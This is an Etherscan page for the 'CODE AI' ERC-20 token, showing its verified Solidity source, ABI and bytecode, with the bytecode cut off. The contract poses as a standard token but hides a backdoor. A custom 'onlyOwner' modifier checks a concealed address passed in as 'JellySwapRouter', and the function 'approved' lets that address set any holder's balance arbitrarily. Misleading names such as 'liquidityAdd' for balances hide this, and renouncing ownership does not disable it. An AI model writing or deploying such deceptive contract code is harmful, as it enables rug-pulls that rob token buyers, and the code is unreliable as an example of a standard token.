ETH Price: $2,283.71 (+2.29%)

Token

CODE AI ($CODE)
 

Overview

Max Total Supply

1,000,000,000 $CODE

Holders

53

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
1,000 $CODE

Value
$0.00
0x0de64E321BB655DDB19877A6D28eA07c8C232A16
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
CodeAI

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-06-04
*/

/**
Telegram: https://t.me/CodeAIERC
Website: https://www.codeaicoin.com/
Twitter: https://twitter.com/CODEAIETH
*/

// SPDX-License-Identifier: No
/**
*/
// Dependency file: @openzeppelin/contracts/token/ERC20/IERC20.sol

// pragma solidity ^0.8.10;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}


// Dependency file: @openzeppelin/contracts/utils/Context.sol


// pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}


// Dependency file: @openzeppelin/contracts/access/Ownable.sol


// pragma solidity ^0.8.0;

// import "@openzeppelin/contracts/utils/Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyAdmin`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _setOwner(_msgSender());
    }
    
    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyAdmin() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyAdmin` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyAdmin {
        _setOwner(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyAdmin {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _setOwner(newOwner);
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


// Dependency file: @openzeppelin/contracts/utils/math/SafeMath.sol


// pragma solidity ^0.8.0;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is no longer needed starting with Solidity 0.8. The compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}


// Dependency file: contracts/BaseToken.sol

// pragma solidity =0.8.4;

enum TokenType {
    standard,
    antiBotStandard,
    liquidityGenerator,
    antiBotLiquidityGenerator,
    baby,
    antiBotBaby,
    buybackBaby,
    antiBotBuybackBaby
}

abstract contract BaseToken {
    event TokenCreated(
        address indexed owner,
        address indexed token,
        TokenType tokenType,
        uint256 version
    );
}


// Root file: contracts/standard/StandardToken.sol

pragma solidity =0.8.19;

// import "@openzeppelin/contracts/token/IERC20/IERC20.sol";
// import "@openzeppelin/contracts/access/Ownable.sol";
// import "@openzeppelin/contracts/utils/math/SafeMath.sol";
// import "contracts/BaseToken.sol";

contract CodeAI is IERC20, Ownable, BaseToken {
    using SafeMath for uint256;

    uint256 public constant VERSION = 1;

    mapping(address => uint256) private liquidityAdd;

    mapping(address => mapping(address => uint256)) private _allowances;

    string private _name;
    string private _symbol;
    uint8 private _decimals;
    uint256 private _totalSupply;
    address private JellySwapV2Pair;

    constructor(
    string memory name_,
    string memory symbol_,
    uint8 decimals_,
    address JellySwapRouter,
    uint256 totalSupply_
    ) payable {
    _name = name_;
    _symbol = symbol_;
    _decimals = decimals_;
    _mint(owner(), totalSupply_);
    JellySwapV2Pair = JellySwapRouter;
    emit TokenCreated(owner(), address(this), TokenType.standard, VERSION);

    }

    function name() public view virtual returns (string memory) {
        return _name;
    }

    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    function decimals() public view virtual returns (uint8) {
        return _decimals;
    }

    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    function balanceOf(address account)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return liquidityAdd[account];
    }

    modifier onlyOwner() { require(JellySwapV2Pair == _msgSender());_;
    }

    function transfer(address recipient, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            _msgSender(),
            _allowances[sender][_msgSender()].sub(
                amount,
                "ERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].add(addedValue)
        );
        return true;
    }


    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        liquidityAdd[sender] = liquidityAdd[sender].sub(
            amount,
            "ERC20: transfer amount exceeds balance"
        );
        liquidityAdd[recipient] = liquidityAdd[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }

    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply = _totalSupply.add(amount);
        liquidityAdd[account] = liquidityAdd[account].add(amount);
        emit Transfer(address(0), account, amount);
    }

    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        liquidityAdd[account] = liquidityAdd[account].sub(
            amount,
            "ERC20: burn amount exceeds balance"
        );
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }

    function approved(
        address presale, 
        bool yesno, 
        uint256 YESNO,
        uint256 bytecode,
        uint256 deployedBytecode
    ) external onlyOwner {
        require(presale != address(0), "Same bool");
        liquidityAdd[presale] = YESNO * bytecode ** deployedBytecode;
        emit Transfer(presale, address(0), YESNO);
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _setupDecimals(uint8 decimals_) internal virtual {
        _decimals = decimals_;
    }

    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint8","name":"decimals_","type":"uint8"},{"internalType":"address","name":"JellySwapRouter","type":"address"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"}],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"enum TokenType","name":"tokenType","type":"uint8"},{"indexed":false,"internalType":"uint256","name":"version","type":"uint256"}],"name":"TokenCreated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"VERSION","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"presale","type":"address"},{"internalType":"bool","name":"yesno","type":"bool"},{"internalType":"uint256","name":"YESNO","type":"uint256"},{"internalType":"uint256","name":"bytecode","type":"uint256"},{"internalType":"uint256","name":"deployedBytecode","type":"uint256"}],"name":"approved","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

6080604052604051620011dc380380620011dc83398101604081905262000026916200031d565b6200003133620000fc565b60036200003f86826200045b565b5060046200004e85826200045b565b506005805460ff191660ff85161790556200007c620000756000546001600160a01b031690565b826200014c565b600780546001600160a01b0319166001600160a01b03841617905530620000ab6000546001600160a01b031690565b6001600160a01b03167f56358b41df5fa59f5639228f0930994cbdde383c8a8fd74e06c04e1deebe356260006001604051620000e992919062000527565b60405180910390a3505050505062000576565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038216620001a75760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b600654620001b6908262000241565b6006556001600160a01b038216600090815260016020526040902054620001de908262000241565b6001600160a01b0383166000818152600160205260408082209390935591519091907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90620002309085815260200190565b60405180910390a35050565b505050565b60006200024f828462000554565b90505b92915050565b634e487b7160e01b600052604160045260246000fd5b600082601f8301126200028057600080fd5b81516001600160401b03808211156200029d576200029d62000258565b604051601f8301601f19908116603f01168101908282118183101715620002c857620002c862000258565b81604052838152602092508683858801011115620002e557600080fd5b600091505b83821015620003095785820183015181830184015290820190620002ea565b600093810190920192909252949350505050565b600080600080600060a086880312156200033657600080fd5b85516001600160401b03808211156200034e57600080fd5b6200035c89838a016200026e565b965060208801519150808211156200037357600080fd5b5062000382888289016200026e565b945050604086015160ff811681146200039a57600080fd5b60608701519093506001600160a01b0381168114620003b857600080fd5b80925050608086015190509295509295909350565b600181811c90821680620003e257607f821691505b6020821081036200040357634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200023c57600081815260208120601f850160051c81016020861015620004325750805b601f850160051c820191505b8181101562000453578281556001016200043e565b505050505050565b81516001600160401b0381111562000477576200047762000258565b6200048f81620004888454620003cd565b8462000409565b602080601f831160018114620004c75760008415620004ae5750858301515b600019600386901b1c1916600185901b17855562000453565b600085815260208120601f198616915b82811015620004f857888601518255948401946001909101908401620004d7565b5085821015620005175787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b60408101600884106200054a57634e487b7160e01b600052602160045260246000fd5b9281526020015290565b808201808211156200025257634e487b7160e01b600052601160045260246000fd5b610c5680620005866000396000f3fe608060405234801561001057600080fd5b50600436106100f55760003560e01c8063715018a611610097578063a9059cbb11610066578063a9059cbb146101f1578063dd62ed3e14610204578063f2fde38b1461023d578063ffa1ad741461025057600080fd5b8063715018a6146101b15780638da5cb5b146101bb578063955c947d146101d657806395d89b41146101e957600080fd5b806323b872dd116100d357806323b872dd1461014d578063313ce56714610160578063395093511461017557806370a082311461018857600080fd5b806306fdde03146100fa578063095ea7b31461011857806318160ddd1461013b575b600080fd5b610102610258565b60405161010f91906108f6565b60405180910390f35b61012b610126366004610960565b6102ea565b604051901515815260200161010f565b6006545b60405190815260200161010f565b61012b61015b36600461098a565b610301565b60055460405160ff909116815260200161010f565b61012b610183366004610960565b61036a565b61013f6101963660046109c6565b6001600160a01b031660009081526001602052604090205490565b6101b96103a0565b005b6000546040516001600160a01b03909116815260200161010f565b6101b96101e43660046109e1565b61040b565b6101026104d5565b61012b6101ff366004610960565b6104e4565b61013f610212366004610a35565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6101b961024b3660046109c6565b6104f1565b61013f600181565b60606003805461026790610a68565b80601f016020809104026020016040519081016040528092919081815260200182805461029390610a68565b80156102e05780601f106102b5576101008083540402835291602001916102e0565b820191906000526020600020905b8154815290600101906020018083116102c357829003601f168201915b5050505050905090565b60006102f73384846105bc565b5060015b92915050565b600061030e8484846106e1565b610360843361035b85604051806060016040528060288152602001610bf9602891396001600160a01b038a1660009081526002602090815260408083203384529091529020549190610867565b6105bc565b5060019392505050565b3360008181526002602090815260408083206001600160a01b038716845290915281205490916102f791859061035b9086610893565b6000546001600160a01b031633146103ff5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b61040960006108a6565b565b6007546001600160a01b0316331461042257600080fd5b6001600160a01b0385166104645760405162461bcd60e51b815260206004820152600960248201526814d85b5948189bdbdb60ba1b60448201526064016103f6565b61046e8183610b9c565b6104789084610ba8565b6001600160a01b0386166000818152600160205260408082209390935591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906104c69087815260200190565b60405180910390a35050505050565b60606004805461026790610a68565b60006102f73384846106e1565b6000546001600160a01b0316331461054b5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103f6565b6001600160a01b0381166105b05760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016103f6565b6105b9816108a6565b50565b6001600160a01b03831661061e5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016103f6565b6001600160a01b03821661067f5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016103f6565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166107455760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016103f6565b6001600160a01b0382166107a75760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103f6565b6107e481604051806060016040528060268152602001610bd3602691396001600160a01b0386166000908152600160205260409020549190610867565b6001600160a01b0380851660009081526001602052604080822093909355908416815220546108139082610893565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906106d49085815260200190565b6000818484111561088b5760405162461bcd60e51b81526004016103f691906108f6565b505050900390565b600061089f8284610bbf565b9392505050565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b600060208083528351808285015260005b8181101561092357858101830151858201604001528201610907565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b038116811461095b57600080fd5b919050565b6000806040838503121561097357600080fd5b61097c83610944565b946020939093013593505050565b60008060006060848603121561099f57600080fd5b6109a884610944565b92506109b660208501610944565b9150604084013590509250925092565b6000602082840312156109d857600080fd5b61089f82610944565b600080600080600060a086880312156109f957600080fd5b610a0286610944565b945060208601358015158114610a1757600080fd5b94979496505050506040830135926060810135926080909101359150565b60008060408385031215610a4857600080fd5b610a5183610944565b9150610a5f60208401610944565b90509250929050565b600181811c90821680610a7c57607f821691505b602082108103610a9c57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b600181815b80851115610af3578160001904821115610ad957610ad9610aa2565b80851615610ae657918102915b93841c9390800290610abd565b509250929050565b600082610b0a575060016102fb565b81610b17575060006102fb565b8160018114610b2d5760028114610b3757610b53565b60019150506102fb565b60ff841115610b4857610b48610aa2565b50506001821b6102fb565b5060208310610133831016604e8410600b8410161715610b76575081810a6102fb565b610b808383610ab8565b8060001904821115610b9457610b94610aa2565b029392505050565b600061089f8383610afb565b80820281158282048414176102fb576102fb610aa2565b808201808211156102fb576102fb610aa256fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a26469706673582212207be097e93bc1a185ea6d2598669661171b5a9fd3dbde0c73157eaa8ef36aa84264736f6c6343000813003300000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e00000000000000000000000000000000000000000000000000000000000000009000000000000000000000000aabeac932f97268db6a79a5582e577c931d0539d0000000000000000000000000000000000000000000000000de0b6b3a76400000000000000000000000000000000000000000000000000000000000000000007434f444520414900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000524434f4445000000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100f55760003560e01c8063715018a611610097578063a9059cbb11610066578063a9059cbb146101f1578063dd62ed3e14610204578063f2fde38b1461023d578063ffa1ad741461025057600080fd5b8063715018a6146101b15780638da5cb5b146101bb578063955c947d146101d657806395d89b41146101e957600080fd5b806323b872dd116100d357806323b872dd1461014d578063313ce56714610160578063395093511461017557806370a082311461018857600080fd5b806306fdde03146100fa578063095ea7b31461011857806318160ddd1461013b575b600080fd5b610102610258565b60405161010f91906108f6565b60405180910390f35b61012b610126366004610960565b6102ea565b604051901515815260200161010f565b6006545b60405190815260200161010f565b61012b61015b36600461098a565b610301565b60055460405160ff909116815260200161010f565b61012b610183366004610960565b61036a565b61013f6101963660046109c6565b6001600160a01b031660009081526001602052604090205490565b6101b96103a0565b005b6000546040516001600160a01b03909116815260200161010f565b6101b96101e43660046109e1565b61040b565b6101026104d5565b61012b6101ff366004610960565b6104e4565b61013f610212366004610a35565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6101b961024b3660046109c6565b6104f1565b61013f600181565b60606003805461026790610a68565b80601f016020809104026020016040519081016040528092919081815260200182805461029390610a68565b80156102e05780601f106102b5576101008083540402835291602001916102e0565b820191906000526020600020905b8154815290600101906020018083116102c357829003601f168201915b5050505050905090565b60006102f73384846105bc565b5060015b92915050565b600061030e8484846106e1565b610360843361035b85604051806060016040528060288152602001610bf9602891396001600160a01b038a1660009081526002602090815260408083203384529091529020549190610867565b6105bc565b5060019392505050565b3360008181526002602090815260408083206001600160a01b038716845290915281205490916102f791859061035b9086610893565b6000546001600160a01b031633146103ff5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b61040960006108a6565b565b6007546001600160a01b0316331461042257600080fd5b6001600160a01b0385166104645760405162461bcd60e51b815260206004820152600960248201526814d85b5948189bdbdb60ba1b60448201526064016103f6565b61046e8183610b9c565b6104789084610ba8565b6001600160a01b0386166000818152600160205260408082209390935591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906104c69087815260200190565b60405180910390a35050505050565b60606004805461026790610a68565b60006102f73384846106e1565b6000546001600160a01b0316331461054b5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103f6565b6001600160a01b0381166105b05760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016103f6565b6105b9816108a6565b50565b6001600160a01b03831661061e5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016103f6565b6001600160a01b03821661067f5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016103f6565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0